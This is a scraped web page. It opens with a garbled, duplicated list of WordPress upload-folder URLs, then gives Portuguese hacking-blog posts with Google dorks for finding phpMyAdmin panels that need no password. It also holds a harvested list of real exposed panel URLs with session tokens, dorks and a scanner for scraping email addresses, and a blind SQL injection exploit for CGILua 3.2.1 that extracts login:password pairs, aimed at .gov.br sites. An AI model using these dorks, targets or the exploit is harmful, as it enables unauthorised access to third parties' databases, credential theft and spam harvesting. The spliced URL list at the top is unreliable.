http://www.fastenershows.com/wp-content/uploads/participants-database/
http://www.agavs.ca/wp-content/uploads/participants-database/
http://d70toastmasters.org.au/wp-content/uploads/participants-database/
http://lincolnillinois.com/wp-content/uploads/participants-database/
http://highbrookrotary.org.nz/wp-content/uploads/participants-database/
http://ptfund.org/wp-content/uploads/participants-database/
http://utahvalley360.com/wp-content/uploads/participants-database/
http://bamta.org/wp-content/uploads/participants-database/
http://nwapa.net/wp-content/uploads/participants-database/
http://victoryparkandsell.com/wp-content/uploads/participants-database/
http://nantmp.org.ng/wp-content/uploads/participants-database/
http://saafrica.org/wp-content/uploads/participants-database/
http://www.atpca.com.au/wp-content/uploads/participants-database/
http://uwtwinregistry.org/wp-content/uploads/participants-database/
http://swiggis-austin.org/wp-content/uploads/participants-database/
http://www.churchspirituallifenh.org/wp-content/uploads/participants-database/
http://mac.mb.ca/wp-content/uploads/participants-database/
http://www.mwphglotx.org/wp-content/uploads/participants-database/
http://www.diinstitute.org/wp-content/uploads/participants-database/
http://www.sbsonline.com.au/wp-content/uploads/participants-database/
http://soulmotion.com/wp-content/uploads/participants-database/
http://www.vancouveraikido.com/wp-content/uploads/participants-database/
http://www.isce.org.uk/wp-content/uploads/participants-database/
http://www.celinamercer.com/wp-content/uploads/participants-database/
http://www.cmtnl.ca/wp-content/uploads/participants-database/
http://www.saror
http://www.thrombose-cancer.com/wp-content/uploads/participants-database/
http://www.iaodapca.org/wp-content/uploads/participants-database/
http://steppingstoneschina.net/wp-content/uploads/participants-database/
http://leg0lad.com/wp-content/uploads/participants-database/
http://www.nuis.co.il/wp-content/uploads/participants-database/
http://www.bikesforhumanity.com.au/wp-content/uploads/participants-database/
http://lanj.org/wp-content/uploads/participants-database/
http://gearupnv.org/wp-content/uploads/participants-database/
http://www.chruit.ch/wp-content/uploads/participants-database/
http://comartspartner.org/wp-content/uploads/participants-database/
http://thezonegroup.com/wp-content/uploads/participants-database/
http://www.alleywatch.com/wp-content/uploads/participants-database/
http://www.fundraisingwithcheese.com/wp-content/uploads/participants-database/
http://lifespringcommunitychurch.net/wp-content/uploads/participants-database/
http://www.wright-b-flyer.org/wp-content/uploads/participants-database/
http://www.fastenershows.com/wp-content/uploads/participants-database/
http://www.agavs.ca/wp-content/uploads/participants-database/
http://d70toastmasters.org.au/wp-content/uploads/participants-database/
http://lincolnillinois.com/wp-content/uploads/participants-database/
http://highbrookrotary.org.nz/wp-content/uploads/participants-database/
http://ptfund.org/wp-content/uploads/participants-database/
http://utahvalley360.com/wp-content/uploads/participants-database/
http://bamta.org/wp-content/uploads/participants-database/
http://nwapa.net/wp-content/uploads/participants-database/
http://victoryparkandsell.com/wp-content/uploads/participants-database/
http://nantmp.org.ng/wp-content/uploads/participants-database/
http://saafrica.org/wp-content/uploads/participants-database/
http://www.atpca.com.au/wp-content/uploads/participants-database/
http://uwtwinregistry.org/wp-content/uploads/participants-database/
http://swiggis-austin.org/wp-content/uploads/participants-database/
http://www.churchspirituallifenh.org/wp-content/uploads/participants-database/
http://mac.mb.ca/wp-content/uploads/participants-database/
http://www.mwphglotx.org/wp-content/uploads/participants-database/
http://www.diinstitute.org/wp-content/uploads/participants-database/
http://www.sbsonline.com.au/wp-content/uploads/participants-database/
http://soulmotion.com/wp-content/uploads/participants-database/
http://www.vancouveraikido.com/wp-content/uploads/participants-database/
http://www.isce.org.uk/wp-content/uploads/participants-database/
http://www.celinamercer.com/wp-content/uploads/participants-database/
http://www.cmtnl.ca/wp-content/uploads/participants-database/
http://www.saroregon.org/wp-content/uploads/participants-database/
http://welshchoir.ca/wp-content/uploads/participants-database/
http://www.pnmc-hsr.org/wp-content/uploads/participants-database/
http://annwagner.com/wp-content/uploads/participants-database/
http://iyba.lasalle.org/wp-content/uploads/participants-database/
http://lpforest.org/wp-content/uploads/participants-database/
http://www.aedunlv.org/wp-content/uploads/participants-database/
http://walkabout.happeningfish.com/wp-content/uploads/participants-database/
http://www.northernarizonaaudubon.org/wp-content/uploads/participants-database/
http://claysportsirl.ie/wp-content/uploads/participants-database/
http://polyathlon-russia.com/wp-content/uploads/participants-database/
http://luislondon.com/wp-content/uploads/participants-database/
http://whatcomwritersandpublishers.org/wp-content/uploads/participants-database/
http://www.financesmediterranee.com/wp-content/uploads/participants-database/
http://bitroop1496.org/wp-content/uploads/participants-database/
http://www.firt2013barcelona.org/wp-content/uploads/participants-database/
http://www.rebbepiper.com/wp-content/uploads/participants-database/
http://promovgroup.com/wp-content/uploads/participants-database/
http://www.mjbandofgold.com/wp-content/uploads/participants-database/
http://cccc-houston.org/wp-content/uploads/participants-database/
http://www.powercollaborative.org/wp-content/uploads/participants-database/
http://www.isarmc.org/wp-content/uploads/participants-database/
http://www.blc-denver2.org/wp-content/uploads/participants-database/
http://qsaudi.com/wp-content/uploads/participants-database/
http://erosrws.com/wp-content/uploads/participants-database/
http://top3crew.com/wp-content/uploads/participants-database/
http://partycrewgh.org/wp-content/uploads/participants-database/egon.org/wp-content/uploads/participants-database/
http://welshchoir.ca/wp-content/uploads/participants-database/
http://www.pnmc-hsr.org/wp-content/uploads/participants-database/
http://annwagner.com/wp-content/uploads/participants-database/
http://iyba.lasalle.org/wp-content/uploads/participants-database/
http://lpforest.org/wp-content/uploads/participants-database/
http://www.aedunlv.org/wp-content/uploads/participants-database/
http://walkabout.happeningfish.com/wp-content/uploads/participants-database/
http://www.northernarizonaaudubon.org/wp-content/uploads/participants-database/
http://claysportsirl.ie/wp-content/uploads/participants-database/
http://polyathlon-russia.com/wp-content/uploads/participants-database/
http://luislondon.com/wp-content/uploads/participants-database/
http://whatcomwritersandpublishers.org/wp-content/uploads/participants-database/
http://www.financesmediterranee.com/wp-content/uploads/participants-database/
http://bitroop1496.org/wp-content/uploads/participants-database/
http://www.firt2013barcelona.org/wp-content/uploads/participants-database/
http://www.rebbepiper.com/wp-content/uploads/participants-database/
http://promovgroup.com/wp-content/uploads/participants-database/
http://www.mjbandofgold.com/wp-content/uploads/participants-database/
http://cccc-houston.org/wp-content/uploads/participants-database/
http://www.powercollaborative.org/wp-content/uploads/participants-database/
http://www.isarmc.org/wp-content/uploads/participants-database/
http://www.blc-denver2.org/wp-content/uploads/participants-database/
http://qsaudi.com/wp-content/uploads/participants-database/
http://erosrws.com/wp-content/uploads/participants-database/
http://top3crew.com/wp-content/uploads/participants-database/
http://partycrewgh.org/wp-content/uploads/participants-database/

quinta-feira, 29 de maio de 2014

Acessando banco de dados PHPMyAdmin sem validação

Acessando PHPMyAdmin sem validação

Acessando PHPMyAdmin sem validação


Resumo:
phpMyAdmin é um aplicativo web desenvolvido em PHP para administração do MySQL pela Internet. A partir deste sistema é possível criar e remover bases de dados, criar, remover e alterar tabelas, inserir, remover e editar campos, executar códigos SQL e manipular campos chaves. O phpMyAdmin é muito utilizado por programadores web que muitas vezes necessitam manipular bases de dados. Normalmente, o phpMyAdmin é tratado como uma ferramenta obrigatória em quase todas as hospedagens da web, além de pacotes off-line, como o WAMPServer, XAMPP, EasyPHP e PHP Triad.

 DORK's DE ACESSO:
 -------------------------------------------------------------------------------------------------------------------------------
inurl:"server_variables.php?token="
inurl:"/index.php?target=server_variables.php"
inurl:"server_processlist.php?" intext:" SHOW PROCESSLIST " & intitle:"phpMyAdmin"
inurl:"server_engines.php?token="
inurl:"server_sql.php?token="
inurl:"server_import.php?token="
inurl:"server_export.php?token="
inurl:"db_structure.php?db="
inurl:"main.php?token=" phpMyAdmin
inurl:"server_collations.php?token="
-------------------------------------------------------------------------------------------------------------------------------

Exemplo de acesso acesso:
ACESSO BANCO DE DADOS



As dorks elaboradas foram baseadas nas urls de acesso, para alguns não deve aprecer pois o painel usa um esquema com iframes com os seguintes menus-url's.


<li><a class="tab" href="server_databases.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/s_db.png" width="16" height="16" alt="Databases" />Databases</a></li>
<li><a class="tab" href="server_sql.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/b_sql.png" width="16" height="16" alt="SQL" />SQL</a></li>
<li><a class="tab" href="server_status.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/s_status.png" width="16" height="16" alt="Status" />Status</a></li>
<li><a class="tab" href="server_variables.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/s_vars.png" width="16" height="16" alt="Variables" />Variables</a></li>
<li><a class="tab" href="server_collations.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/s_asci.png" width="16" height="16" alt="Charsets" />Charsets</a></li>
<li><a class="tab" href="server_engines.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/b_engine.png" width="16" height="16" alt="Engines" />Engines</a></li>
<li><a class="tabactive" href="server_processlist.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/s_process.png" width="16" height="16" alt="Processes" />Processes</a></li> <li><a class="tab" href="server_export.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/b_export.png" width="16" height="16" alt="Export" />Export</a></li>
<li><a class="tab" href="server_import.php?token=4f30b5467a4061773e1fe072ac833377" ><img class="icon" src="./themes/original/img/b_import.png" width="16" height="16" alt="Import" />Import</a></li> </ul>

OBS: Algums serves não te daram acesso de imediato as tabelas, para isso use o executor de sql.
Usando SCANNER INURL para facilitar a busca.

Exemplo de comando:
php botConsole.php --host='www.google.com.br' --dork='inurl:"server_processlist.php?" intext:" SHOW PROCESSLIST " & intitle:"phpMyAdmin" -assembla' --arquivo='MYSQL.txt' --tipoerro='2' --exploit='' --achar='phpMyAdmin'

 Usando SCANNER INURL para facilitar a busca.


DEBUG:
----------------------------------------------------------------------------------------------------------------------------
0xHOST GOOGLE........: www.google.com.br
0xDORK...............: inurl:"server_processlist.php?" intext:" SHOW PROCESSLIST " & intitle:"phpMyAdmin" -assembla
0xEXPLOIT............:
0xARQUIVO............: MYSQL.txt
0xTIPO DE ERRO.......: 2
0xPROCURAR NO ALVO...: phpMyAdmin
0xIP PROXY...........:
0xPORTA..............:
----------------------------------------------------------------------------------------------------------------------------
0xCARREGANDO CONFIGURAÇÕES...
DEBUG:
Array
(
    [0] => Array
        (
        )

    [host] => www.google.com.br
    [dork] => inurl%3A%22server_processlist.php%3F%22+intext%3A%22+SHOW+PROCESSLIST+%22+%26+intitle%3A%22phpMyAdmin%22+-assembla
    [arquivo] => MYSQL.txt
    [tipoerro] => 2
    [exploit] =>
    [achar] => phpMyAdmin
    [ipProxy] =>
    [porta] =>
    [url] => /search?q=inurl%3A%22server_processlist.php%3F%22+intext%3A%22+SHOW+PROCESSLIST+%22+%26+intitle%3A%22phpMyAdmin%22+-assembla&num=1900&btnG=Search
    [port] => 80
)



[ BAIXAR: http://pastebin.com/TzijC99y  ] 

REF:
http://pt.wikipedia.org/wiki/PhpMyAdmin
http://www.phpmyadmin.net/


Resultados da pesquisa:

http://mech.sharif.ir/~web/phpmyadmin/server_processlist.php
http://www.zumrutcim.com/phpMyAdmin/index.php?server=1&target=server_processlist.php&token=5ee6b4ef3eec67db200cffb4ca96bd97
www.zumrutcim.com/phpMyAdmin/index.php?server=1&target=server_processlist.php&token=5ee6b4ef3eec67db200cffb4ca96bd97
http://www.nautilus.com.br/clientes/phpmyadmin_barcessat/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=f4e23698e63cb037f9ceb9eae1bd66da
http://www.settimanasudoku.it/mysqladmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=0717590837c536a6b2fdf71b3e3dfb69&full=1&phpMyAdmin=qSVwBZtc8J68bUpNrdmHohiwvO6
http://www.settimanasudoku.it/mysqladmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=629550b445dd53557edc873fea8256a7&full=1&phpMyAdmin=upcVaWZRbIqzaA7ZIn2NC7tcVXa
http://www.settimanasudoku.it/mysqladmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=7850d21f77f5ff41c6a30d1468df949e&full=1&phpMyAdmin=5IeY%2C8tUFuMK6QBK-QvQoDVhkI0
http://contemar.com/phpMyAdmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=25a89618f06d460b726bb902f261dc48
http://contemar.com/phpmyadmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=c0c6689d5bfd46016dfce6ad2e7dfc49
http://kalifaalmisnad.com/phpMyAdmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=d8f0843a76df17a88f489880a8a0fe86
http://webservice.jmasjuarez.gob.mx:8888/phpmyadmin/server_processlist.php?token=3b348ec6ff1b099c465f8ca203656538&full=1
https://www.der-insolvenzberater.de/phpMyAdmin/server_processlist.php?lang=en-utf-8&server=1&collation_connection=utf8_general_ci&kill=209505387
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=01395f779fcfe1160c96f9eb839860af&kill=15710
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=3d4354e7a691623453b29361ea95be24&kill=17812
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=61a9ec4af824fbf24b368f29ba2f36d3&kill=116759
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=ce58de690a926679d6b10589bb1b25a1&kill=15076
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=ae7332a9388dd4763b0f9195b67ce197&kill=148286
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=1d847c6be291d8428d8c828af4fde151&kill=113261
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=be9a026238ab69f456c53337318599a3&kill=22662
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=161b1d193b0032814d65f117af4074cb&kill=12862
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=3ba1c5db1b7c429310ca466d8a3a4f9a&kill=108535
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=1de9baadfb04138dcc81eb84d4b45421&kill=11170
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=1bd8be911d5ea86940f12a7e7bd314c7&kill=15121
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=6b7d94bc8ead69989a5029f85594ac28&kill=11628
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=615dee42fa4bb4f27dadb0fc5443a126&kill=14768
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=79d1803b895548651c481a7358109955&kill=171800
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=dde1ce380bf8aef5e540b98d03c71f82&kill=49081
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=5e5761963c4f8e162ef84d9c1314426b&kill=28424
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=fe769b489d3faa1af424d7f494a2fd7b&kill=5552
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=81809c221f69540df71746d8a4974216&kill=115784
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=7bd07acd4c06d737d445184c2daa9934&kill=154635
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=3023cf534d907c3096a907c26f2b31df&kill=17227
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=28b024572f0f02fa5540619532cc448c&kill=12683
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=61415fd5a6703bff296bd9a95b186a9c&kill=30052
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=87ad999dfd8e1e831ee4d8a7a4fdc6be&kill=4724
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=a5c70b6418a08d53b441f85aba7ab469&kill=16152
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=08c87f19ccbea81587423b4c7658a17e&kill=14637
https://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=b17527ee7093814acd79faef0ca0642a&kill=17173
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=15c68c757f728a341a8e670a6dec1f74&kill=12618
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=d4b87d5771681e2677becd9cfa8cc42b&kill=730
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=d52749f3c3fa8de4f3cb4c692ee27bc1&kill=15447
http://69019.eof.afpa.fr/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=9c4973ed00c81fea82949e86074767da&kill=10851
http://royaltouchny.com/phpMyAdmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=b64ac0249e08905103b6c694b46d209b
http://www.elektro-denker.com/phpMyAdmin-elebwbvm/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=6788654e634886ee9ca4ca18818a7f99&full=1
www.elektro-denker.com
www.elektro-denker.com/
http://202.137.230.154/phpmyadmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=04f7d18dd41feabf6f193ce98845d0e7
http://apse.com.tw/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=ef4ce41cc7bb19fa4216a8d1fd89b2a5&kill=84848
http://apse.com.tw/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=28e762b909008475fa0df0b505d9594d&kill=90009
http://apse.com.tw/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=d54040fd24f287358e5c83e51d41005a&kill=82080
http://apse.com.tw/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=dbff09ac97b69ce0b6647a1aed5b9424&kill=82182
http://apse.com.tw/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=03aa0d1eb55f9506a963c6b3f7222362&kill=88181
http://apse.com.tw/phpmyadmin/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_general_ci&token=b83e7763a2d3035eadf0a3f6c5c20827&kill=80865
http://cetl.gtu.ge/myadmin/server_processlist.php?lang=en-iso-8859-1&server=1&kill=16599770
http://cetl.gtu.ge/myadmin/server_processlist.php?lang=en-iso-8859-1&server=1&kill=3127566
http://cetl.gtu.ge/myadmin/server_processlist.php?lang=en-iso-8859-1&server=1&kill=2344240
http://cetl.gtu.ge/myadmin/server_processlist.php?lang=en-iso-8859-1&server=1&kill=17134474
http://118.97.147.162/phpmyadmin/server_processlist.php?token=914db90734e2ffdf1ae593444fac693a
http://www.rocketys.net/server_processlist.php?token=6fe896b38b75bc846cefc533fa18b8b9
www.rocketys.net
www.rocketys.net/
http://made-in-dk.eu/phpMyAdmin-knoktfdu4/server_processlist.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=5a55615d2a73c3ee8e79741f1c27c637&kill=35563628
http://maxxyz.de/server_processlist.php?token=a863cfb68b631c080e3e289b75dfee9c
http://www.self.org.uk/server_processlist.php?token=5bfb8e5316455b364516652ae3fd34cb
www.self.org.uk
www.self.org.uk/
http://itarget.fr/phpmyadmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=1a8151db903b7e9cf2a0ee3ea2815bd4
http://xellnaga.free.fr/phpMyAdmin/index.php?server=1&target=server_processlist.php&lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=61023193d1a9303ab9c0a9fa397ef1cd
http://www.inrx.cn/shopinrxadmin/server_processlist.php?lang=zh-utf-8&server=1&collation_connection=utf8_general_ci&kill=2711119
http://www.inrx.cn/shopinrxadmin/server_processlist.php?lang=zh-utf-8&server=1&collation_connection=utf8_general_ci&kill=80890
http://www.inrx.cn/shopinrxadmin/server_processlist.php?lang=zh-utf-8&server=1&collation_connection=utf8_general_ci&kill=500730
http://210.14.6.59/phpmyadmin/server_processlist.php?lang=zh-utf-8&server=1&collation_connection=utf8_general_ci&kill=3333&phpMyAdmin=73684aa4546609bf75358e6b1a9e6e91
http://210.14.6.59/phpmyadmin/server_processlist.php?lang=zh-utf-8&server=1&collation_connection=utf8_general_ci&kill=14037&phpMyAdmin=73684aa4546609bf75358e6b1a9e6e91



quinta-feira, 23 de janeiro de 2014

TUTORIAL / BUSCAR EMAILS [ SCANNER INURLMAIL 1.0 ]


INURLMAIL
TUTORIAL / BUSCAR EMAILS [ SCANNER INURLMAIL 1.0 ]


Demonstração de uso do scanner a versão que é utilizada neste vídeo é uma beta, mas o link disponível para down já é final de uso.
VÍDEO AULA PART-01
###################################
* SCANNER INURL-MAIL 1.0
* PHP Version 5.4.7
* php5-curl LIB
* cURL support enabled
* cURL Information 7.24.0
* Apache 2.4
* allow_url_fopen = On
* Motor de busca GOOGLE
* Permissão Leitura & Escrita
* -----------------------------------------------------------------
* BUSCA LISTMAIL
* OBJETIVO USAR O MOTOR DE BUSCA GOOGLE PARA CAPTURAR EMAILS LIST.
* A CADA URL ENCONTRADA PELO BUSCADOR, SERA EFETUADO UM FILTRO      CAPTURANDO OS EMAILS
* CONTIDOS NA URL.
* -----------------------------------------------------------------
* GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.
* fb.com/GoogleINURL
* twitter.com/GoogleINURL
* blog.inurl.com.br
################################

Tutorial SCANNER INURLMAIL 1.0 PART-01





Comando de uso:
php inurlmail.php  --dork='site:.com.br hotmail ext:txt'  --arquivo='mails.txt'
php inurlmail.php ajuda

Tutorial SCANNER INURLMAIL 1.0 PART-02



Baixar: https://github.com/googleinurl/INURLMAIL

terça-feira, 10 de dezembro de 2013

Usando SNCANNER INURL para achar falhas em aplicações CGILua

Exploitando CGILua
Usando SNCANNER INURL para achar falhas em aplicações CGILua

O CGILua' é uma ferramenta que permite criar páginas Web dinâmicas e manipular a inserção de dados por meio de formulários Web.
ID de referências para cada página tem um ID específico ("sid") que o quadro utiliza na maioria das URLs.

EXPLOIT USADO: '0x272D2D3B

DORK[1]: CGILua 3.2.1 CGI
Filtrando domínio.
DORK[2]: site:.gov.br intext:"CGILua 3.2.1 CGI"
DORK[3]: inurl:cgi/cgilua.exe/sys/start.htm?sid=1
DORK[4]: inurl:"cgi/cgilua.exe/"


Usando SCANNER INURL para achar possíveis falhas:

TOTAL DE URL's: 75

TOTAL DE POSSÍVEIS VULL: 18

ARQUIVO COM RESULTADO: resultados.txt

http://blog.inurl.com.br/2013/09/cgilua-321-cgi-exploit.html

Scanner INURL:
https://code.google.com/p/scanner-inurl/

segunda-feira, 2 de dezembro de 2013

Dork obter acesso ao painel phpMyadmin.

phpMyadmin sem senha
Acesso ao phpMyadmin sem senha

phpMyAdmin é um Aplicativo Web desenvolvido em PHP para administração do MySQL pela Internet. A partir deste sistema é possível criar e remover bases de dados, criar, remover e alterar tabelas, inserir, remover e editar campos, executar códigos SQL e manipular campos chaves. O phpMyAdmin é muito utilizado por programadores web que muitas vezes necessitam manipular bases de dados. Normalmente, o phpMyAdmin é tratado como uma ferramenta obrigatória em quase todas as hospedagens da web, além de pacotes off-line, como o WAMPServer, XAMPP, EasyPHP e PHP Triad.
Ref:http://pt.wikipedia.org/wiki/PhpMyAdmin


DORK[0]: ext:php  intext:"SQL-query" intext:"Without PHP Code" & intitle:("phpMyAdmin 2*)

DORK[1]: inurl:.php? intext:"CHARACTER_SETS,COLLATIONS" intitle:phpmyadmin intext:"Field_name"

DORK[2]: inurl:.php? intext:"information_schema" intitle:phpmyadmin intext:"Field_name"

DORK[3]: ext:php  intext:"SQL-query" intitle:phpmyadmin & intext:"Show this query here again "

DORK[4]: ext:php  intext:"SQL-query" intitle:phpmyadmin intext:"Field_name"

DORK[5]: intitle:phpmyadmin intext:" [Edit] [Explain SQL]"

DORK[6]: site:br intitle:phpmyadmin intext:" [Edit] [Explain SQL]"


As Dorks acima foram baseadas na seguinte:
http://www.exploit-db.com/ghdb/3862/

sexta-feira, 20 de setembro de 2013

DORK BUSCA DE EMAIL LIST

DORK BUSCA DE EMAIL LIST

DORK['0'] site:.br [email protected] (hotmail|yahoo|bol) br ext:txt
DORK['1'] site:br title:"index of" @ yahoo br ext:csv

Exemplo de achado:
site:www.contabeis.com.br ext:txt
site:www.tramontina.com.br ext:csv

terça-feira, 17 de setembro de 2013

CGILua 3.2.1 CGI exploit

CGILua 3.2.1 CGI exploit

O CGILua'
é uma ferramenta que permite criar páginas Web dinâmicas e manipular a inserção de dados por meio de formulários Web.
O CGILua permite separar o tratamento dos dados e a lógica do processo de geração de páginas, facilitando o desenvolvimento de aplicativos Web em Lua. Uma das vantagens do CGILua é sua capacidade de abstrair o servidor Web utilizado.
Você pode desenvolver um aplicativo em CGILua para um servidor Web e executá-lo em qualquer outro servidor Web compatível com CGILua.
O CGILua é um programa escrito em C onde você embute trechos escritos em Lua. E o executável do CGILua faz toda a comunicação desse trecho Lua com o protocolo http da Internet. Ou seja, ele faz o papel do CGI.


======================================================================
DORK[1]: CGILua 3.2.1 CGI
Filtrando domínio.
DORK[2]: site:.gov.br intext:"CGILua 3.2.1 CGI"
DORK[3]: inurl:cgi/cgilua.exe/sys/start.htm?sid=1
DORK[4]: inurl:"cgi/cgilua.exe/"
======================================================================


ID de referências para cada página tem um ID específico ("sid") que o quadro utiliza na maioria das URLs.
Por exemplo, para acessar a página referida pelo ID = 1, o
Seguinte URL é usada:

======================================================================
Exploit - SQL injection
======================================================================

FALHA: /publique/cgi/cgilua.exe/sys/start.htm?sid=1[INJEÇÃO-SQL]

EXPLOIT = /publique/cgi/cgilua.exe/sys/start.htm?sid=1))+U
NION+ALL
+SELECT+IF((ASCII(SUBSTRING((SELECT+CONCAT(F_Login,':',F_Password)+FROM

+Publique.T_Actor+LIMIT+1+OFFSET+0),1,1))>97),BENCHMARK(1000000,MD5('A'
)),0)%23


Essa consulta primeiros concatena "F_Login" e colunas "F_Password" do tabela interna "T_Actor" e retorna a primeira linha (graças à "LIMIT 1 DESVIO 0 "statement). Então, ele verifica se o valor ASCII do primeiro caractere retornado é maior do que 97 (a letra 'a'). Se a condição for satisfeita ele irá acionar a função de referência, causando um atraso significativo no servidor resposta (cerca de 4 segundos usando nosso laboratório de testes). Ao repetir a consulta

======================================================================
USANDO Exploit:
======================================================================

http://SITE/publique/cgi/cgilua.exe/sys/start.htm?sid=1[EXPLOIT]


http://SITE/publique/cgi/cgilua.exe/sys/start.htm?sid=1))+U
NION+ALL
+SELECT+IF((ASCII(SUBSTRING((SELECT+CONCAT(F_Login,':',F_Password)+FROM

+Publique.T_Actor+LIMIT+1+OFFSET+0),1,1))>97),BENCHMARK(1000000,MD5('A'
)),0)%23


NEM TODOS DÃO CERTO, mas pode gerar um erro que vai te mostrar qual tipo de banco você esta tratando, assim direcionar melhor sua investida.


REF:http://pt.wikipedia.org/wiki/CGILua
